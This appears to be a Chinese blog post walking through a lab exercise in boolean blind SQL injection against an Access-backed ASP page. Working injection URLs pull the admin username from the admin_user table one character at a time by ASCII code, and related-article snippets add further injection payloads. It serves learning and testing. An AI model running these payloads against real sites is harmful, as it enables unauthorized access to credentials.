Access数据库盲注练习

最新推荐文章于 2021-12-13 22:16:14 发布
最新推荐文章于 2021-12-13 22:16:14 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: web安全学习 文章标签: access sql注入 SQL盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39762423/article/details/99462050
版权

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>5

显示错误

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>4

显示正常

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)=4

显示错误

 

 

 

 

 

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)=5

显示正常

 

所以admin列的第一条记录有5个字符的长度,然后根据ASCII码来从第一个字符开始猜

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>100

 显示admin表中的第一条记录的第一个字符,asc(表名,位置,1) 中的1代表这一列

显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>97  显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>96  显示正常

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)=96 显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)=97 显示正常

说明第一个字符的ASCII码是97,a

 

再猜第二个字符

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,2,1)) from admin_user)=100

 

ASCII码为d

 

第三位

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,3,1)) from admin_user)=109

 

ASCII码为109的是m
第四位

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,4,1)) from admin_user)=105

 

105是i

 

第五位

110是n

 

所以admin字段中的第一个内容是admin,

 

猜解密码

 

再用等号试一下

所以密码加密后是32位的,再利用前面类似的用ASCII码猜每一位。

 

 

RrEeSsEeTt
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入access盲注
游魂的博客
12-06 1036
ACCESS盲注: 一般用于没有回显位,无法直接回显数据库内容。 有两种语句方法: 第一种方法: http://192.168.1.1/news.asp?id=155 order by 1 回显数据库错误,既不可用回显注入。 http://192.168.1.1/news.asp?id=155 and 1=1 返回正常 http://192.168.1.1/news.asp?id=155 and ...
练习Access数据库
08-25
新手练习数据库录入录出用,设计的也不错
Access数据库练习
helldoger的博客
12-13 440
写入配置文件App.config <?xml version="1.0" encoding="utf-8" ?> <configuration> <connectionStrings> <add name="connString" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\DB\Acctest11.mdb"/> </connectionStrings>
Access数据库基于时间盲注的实现[www.freebuf.com]
weixin_33831196的博客
08-30 330
Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。0×00概述众所周知,access数据库是不支持基于时间的盲注方式,但是我们可以利用access的系统表MSysAccessObjects,通过多...
access 数据库盲注。。。
weixin_34174132的博客
12-20 477
2019独角兽企业重金招聘Python工程师标准>>> ...
Access 2010数据库引擎
04-11
Access 2010数据库引擎是Microsoft Office 2010套装中的一部分,它提供了对多种数据库格式的支持,包括但不限于Access数据库(.mdb和.accdb)以及通用的OLE DB和ODBC数据源。这个数据库引擎被称为Jet或者ACE(Access...
Access数据库.accdb驱动
06-04
Access数据库是一种由微软开发的关系型数据库管理系统(RDBMS),主要应用于小型到中型企业,用于存储和管理数据。它的数据库文件格式为.accdb,是Access 2007及以后版本所采用的默认格式,提供了更强大的数据类型...
无忧考吧+二级Access数据库考试练习系统2020.03版
03-13
无忧考吧专注于计算机等级模拟考试系统与财会考试模拟系统的开发与维护,拥有全面的教、学、模、练体系,其中包括会计从业、初级职称、计算机一级MS、二级MS、二级C语言、二级C++、二级JAVA、二级Access、二级VB、二...
unity访问Access数据库demo
04-13
在Unity中访问Access数据库通常涉及到使用ADO.NET框架,这是一个由微软开发的数据访问技术,它允许开发者与各种数据库进行交互,包括Microsoft Access。本示例"unity访问Access数据库demo"提供了一个具体的实现,...
ACCESS数据库练习题.docx
10-03
1. Access 2010 是一种数据库管理软件,用于管理和组织各种类型的数据。它不属于单纯的数据库数据库系统或数据库管理员,而是提供了一个用户友好的界面来操作和设计数据库。 2. 在 Access 2010 中,实际存放数据...
Access练习
07-23
用于Access考试和复习的习题集合,带答案
Access数据库程序设计上机操作练习
01-01
该习题适于考计算机二级access的学生,当然,对access 感兴趣的人也可以了解一下
Access基本数据库文件和上机模拟练习
03-08
Access基本数据库文件和上机模拟练习
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
asp.net 通用Common类库
10-21
asp.net项目下通用Common类库
WEB安全 ACCESS 注入、盲注脚本
weixin_30266885的博客
12-08 113
http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过http://www.xxx.cn/cp.asp?classid=3 AND 1=2http://www.xxx.cn/cp.asp?...
大学计算机access综合题试题,ACCESS练习题集(共13个份)
weixin_32578799的博客
07-05 1242
内容简介:ACCESS练习题集(共13个份)一、填空题(每空1.5分,20格,共30分)1、为数据库的建立、使用和维护而配置的软件是 。2、窗体是数据库中用户和应用程序之间的___________,用户对数据库的任何操作都可以通过它来完成。3、如果在创建表中建立字段“性别”,并要求用逻辑值表示,其数据类型应当是__ ________。4、根据对操作表操作的不同,查询...
ACCESS盲注之获取网站的管理员账户密码
weixin_48170459的博客
12-05 1957
我们将通过一个网站来熟悉ACCESS盲注 靶机: win2003 我们先在网站的各个地方寻找注入点,发现在id的位置存在一个注入点 接着判断是字符型注入还是数值型注入,发现是数值型注入 1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1 2.数值型测试:id=2 and 1=1 接着进行错误注入判断 id=2 and 1=0 判断是否为ACCESS数据库 id=2 and exists(select * from sysobjects) id=2 and exists(
ACCESS延时注入
weixin_34203832的博客
12-05 268
这也算是个新知识吧。今天遇到个站,实实在在存在注入,但是弄不出字段。本应该可以用便宜注入。但是不知道为什么就是就是弄不出来. 大家如果有兴许可以加学习交流群:281245781 交流一下吧。 Payload:  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects A...
2021年数据库选择题练习题库.docx
最新发布
12-14
2021年数据库选择题练习题库.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值